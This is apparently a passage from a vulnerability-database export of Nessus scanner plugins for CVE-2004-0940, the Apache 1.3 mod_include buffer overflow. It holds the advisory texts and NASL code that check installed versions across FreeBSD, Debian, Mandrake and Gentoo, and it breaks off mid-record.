"FREEBSD_APACHE_1333_MOD_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15797", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_6e6a6b8a2fde11d9b3a20050fc56d258.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(15797);\n script_version(\"$Revision: 1.9 $\");\n script_cve_id(\"CVE-2004-0940\");\n\n script_name(english:\"FreeBSD : apache mod_include buffer overflow vulnerability (11)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: apache+ipv6');\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://bugs.libgd.org/?do=details&amp;task_id=70\nhttp://bugs.libgd.org/?do=details&amp;task_id=87\nhttp://bugs.libgd.org/?do=details&amp;task_id=89\nhttp://bugs.libgd.org/?do=details&amp;task_id=92\nhttp://bugs.libgd.org/?do=details&amp;task_id=94\nhttp://www.bugzilla.org/security/2.18.1/\nhttp://www.frsirt.com/english/advisories/2007/2336\nhttp://www.libgd.org/ReleaseNote020035\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html\nhttp://www.mozilla.org/security/announce/mfsa2005-46.html\nhttp://www.mozilla.org/security/announce/mfsa2005-47.html\nhttp://www.securitylab.ru/48807.html\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=292544');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/6e6a6b8a-2fde-11d9-b3a2-0050fc56d258.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/11/23\");\n script_cvs_date(\"$Date: 2011/10/03 00:48:24 $\");\n script_end_attributes();\n script_summary(english:\"Check for apache+ipv6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #37841 (freebsd_pkg_6e6a6b8a2fde11d9b3a20050fc56d258.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=6;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"apache<1.3.33\");\n\npkg_test(pkg:\"apache+mod_ssl<1.3.32+2.8.21_1\");\n\npkg_test(pkg:\"apache+mod_ssl+ipv6<1.3.32+2.8.21_1\");\n\npkg_test(pkg:\"apache+mod_perl<=1.3.31\");\n\npkg_test(pkg:\"apache+ipv6<1.3.33\");\n\npkg_test(pkg:\"apache+ssl<=1.3.29.1.55\");\n\npkg_test(pkg:\"ru-apache<1.3.33+30.21\");\n\npkg_test(pkg:\"ru-apache+mod_ssl<1.3.33+30.21+2.8.22\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-09-14T13:15:28", "description": "The remote web server appears to be running a version of Apache that\nis older than version 1.3.33.\n\nThis version is vulnerable to a local buffer overflow in the get_tag()\nfunction of the module 'mod_include' when a specially crafted document\nwith malformed server-side includes is requested though an HTTP\nsession.\n\nSuccessful exploitation can lead to execution of arbitrary code with\nescalated privileges, but requires that server-side includes (SSI) is\nenabled.", "edition": 18, "published": "2004-10-25T00:00:00", "title": "Apache mod_include get_tag() Function Local Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2004-10-25T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_INCLUDE_PRIV_ESCALATION.NASL", "href": "https://www.tenable.com/plugins/nessus/15554", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15554);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_bugtraq_id(11471);\n script_xref(name:\"RHSA\", value:\"2005:816\");\n script_xref(name:\"Secunia\", value:\"12898\");\n script_xref(name:\"Secunia\", value:\"19073\");\n\n script_name(english:\"Apache mod_include get_tag() Function Local Overflow\");\n script_summary(english:\"Checks for version of Apache\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a local buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server appears to be running a version of Apache that\nis older than version 1.3.33.\n\nThis version is vulnerable to a local buffer overflow in the get_tag()\nfunction of the module 'mod_include' when a specially crafted document\nwith malformed server-side includes is requested though an HTTP\nsession.\n\nSuccessful exploitation can lead to execution of arbitrary code with\nescalated privileges, but requires that server-side includes (SSI) is\nenabled.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache 1.3.33 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/10/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n\n script_dependencie(\"http_version.nasl\", \"os_fingerprint.nasl\", \"macosx_SecUpd20041202.nasl\");\n script_require_keys(\"www/apache\", \"Settings/ParanoidReport\"); \n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif ( get_kb_item(\"CVE-2004-0940\") ) exit(0);\n\nport = get_http_port(default:80, embedded:TRUE);\nif(!port)exit(0);\nif(!get_port_state(port))exit(0);\n\nbanner = get_backport_banner(banner:get_http_banner(port: port));\nif(!banner)exit(0);\n\nserv = strstr(banner, \"Server\");\nif(ereg(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/(1\\.([0-2]\\.|3\\.([0-9][^0-9]|[0-2][0-9]|3[0-2])))\", string:serv))\n {\n security_warning(port);\n exit(0);\n }\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:03:07", "description": "Two vulnerabilities have been identified in the Apache 1.3 webserver :\n\n - CAN-2004-0940\n 'Crazy Einstein' has discovered a vulnerability in the\n 'mod_include' module, which can cause a buffer to be\n overflown and could lead to the execution of arbitrary\n code.\n\n - NO VULN ID\n\n Larry Cashdollar has discovered a potential buffer\n overflow in the htpasswd utility, which could be\n exploited when user-supplied is passed to the program\n via a CGI (or PHP, or ePerl, ...) program.", "edition": 26, "published": "2004-11-17T00:00:00", "title": "Debian DSA-594-1 : apache - buffer overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2004-11-17T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:apache"], "id": "DEBIAN_DSA-594.NASL", "href": "https://www.tenable.com/plugins/nessus/15729", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-594. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15729);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_xref(name:\"DSA\", value:\"594\");\n\n script_name(english:\"Debian DSA-594-1 : apache - buffer overflows\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities have been identified in the Apache 1.3 webserver :\n\n - CAN-2004-0940\n 'Crazy Einstein' has discovered a vulnerability in the\n 'mod_include' module, which can cause a buffer to be\n overflown and could lead to the execution of arbitrary\n code.\n\n - NO VULN ID\n\n Larry Cashdollar has discovered a potential buffer\n overflow in the htpasswd utility, which could be\n exploited when user-supplied is passed to the program\n via a CGI (or PHP, or ePerl, ...) program.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-594\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache packages.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.3.26-0woody6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/17\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"apache\", reference:\"1.3.26-0woody6\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"apache-common\", reference:\"1.3.26-0woody6\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"apache-dev\", reference:\"1.3.26-0woody6\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"apache-doc\", reference:\"1.3.26-0woody6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:23", "description": "A possible buffer overflow exists in the get_tag() function of\nmod_include, and if SSI (Server Side Includes) are enabled, a local\nattacker may be able to run arbitrary code with the rights of an httpd\nchild process. This could be done with a special HTML document using\nmalformed SSI.\n\nThe updated packages have been patched to prevent this problem.", "edition": 24, "published": "2004-11-17T00:00:00", "title": "Mandrake Linux Security Advisory : apache (MDKSA-2004:134)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2004-11-17T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:apache-modules", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:apache-devel", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:apache-source", "p-cpe:/a:mandriva:linux:apache"], "id": "MANDRAKE_MDKSA-2004-134.NASL", "href": "https://www.tenable.com/plugins/nessus/15739", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:134. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15739);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_xref(name:\"MDKSA\", value:\"2004:134\");\n\n script_name(english:\"Mandrake Linux Security Advisory : apache (MDKSA-2004:134)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A possible buffer overflow exists in the get_tag() function of\nmod_include, and if SSI (Server Side Includes) are enabled, a local\nattacker may be able to run arbitrary code with the rights of an httpd\nchild process. This could be done with a special HTML document using\nmalformed SSI.\n\nThe updated packages have been patched to prevent this problem.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-1.3.29-1.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-devel-1.3.29-1.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-modules-1.3.29-1.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-source-1.3.29-1.3.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.1\", reference:\"apache-1.3.31-7.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache-devel-1.3.31-7.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache-modules-1.3.31-7.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache-source-1.3.31-7.1.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-1.3.28-3.4.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-devel-1.3.28-3.4.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-modules-1.3.28-3.4.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-source-1.3.28-3.4.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:45:21", "description": "There is a buffer overflow in a function used by mod_include that may\nenable a local user to gain privileges of a httpd child. Only users\nthat are able to create SSI documents can take advantage of that\nvulnerability.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "FreeBSD : apache mod_include buffer overflow vulnerability (6e6a6b8a-2fde-11d9-b3a2-0050fc56d258)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6", "p-cpe:/a:freebsd:freebsd:ru-apache", "p-cpe:/a:freebsd:freebsd:apache+mod_perl", "p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache+ipv6", "p-cpe:/a:freebsd:freebsd:apache+ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl", "p-cpe:/a:freebsd:freebsd:apache"], "id": "FREEBSD_PKG_6E6A6B8A2FDE11D9B3A20050FC56D258.NASL", "href": "https://www.tenable.com/plugins/nessus/37841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37841);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0940\");\n\n script_name(english:\"FreeBSD : apache mod_include buffer overflow vulnerability (6e6a6b8a-2fde-11d9-b3a2-0050fc56d258)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a buffer overflow in a function used by mod_include that may\nenable a local user to gain privileges of a httpd child. Only users\nthat are able to create SSI documents can take advantage of that\nvulnerability.\"\n );\n # http://www.securitylab.ru/48807.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securitylab.ru/48807.html\"\n );\n # https://vuxml.freebsd.org/freebsd/6e6a6b8a-2fde-11d9-b3a2-0050fc56d258.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c17ce797\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache<1.3.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl<1.3.32+2.8.21_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+ipv6<1.3.32+2.8.21_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_perl<=1.3.31\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ipv6<1.3.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ssl<=1.3.29.1.55\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache<1.3.33+30.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache+mod_ssl<1.3.33+30.21+2.8.22\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:52", "description": "The remote host is affected by the vulnerability described in GLSA-200411-03\n(Apache 1.3: Buffer overflow vulnerability in mod_include)\n\n A possible buffer overflow exists in the get_tag() function of\n mod_include.c.\n \nImpact :\n\n If Server Side Includes (SSI) are enabled, a local attacker may be able to\n run arbitrary code with the rights of an httpd child process by making use\n of a specially crafted document with malformed SSI.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2004-11-02T00:00:00", "title": "GLSA-200411-03 : Apache 1.3: Buffer overflow vulnerability in mod_include", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2004-11-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-200411-03.NASL", "href": "https://www.tenable.com/plugins/nessus/15606", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200411-03.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15606);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_xref(name:\"GLSA\", value:\"200411-03\");\n\n script_name(english:\"GLSA-200411-03 : Apache 1.3: Buffer overflow vulnerability in mod_include\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200411-03\n(Apache 1.3: Buffer overflow vulnerability in mod_include)\n\n A possible buffer overflow exists in the get_tag() function of\n mod_include.c.\n \nImpact :\n\n If Server Side Includes (SSI) are enabled, a local attacker may be able to\n run arbitrary code with the rights of an httpd child process by making use\n of a specially crafted document with malformed SSI.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apacheweek.com/features/security-13\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200411-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache users should upgrade to 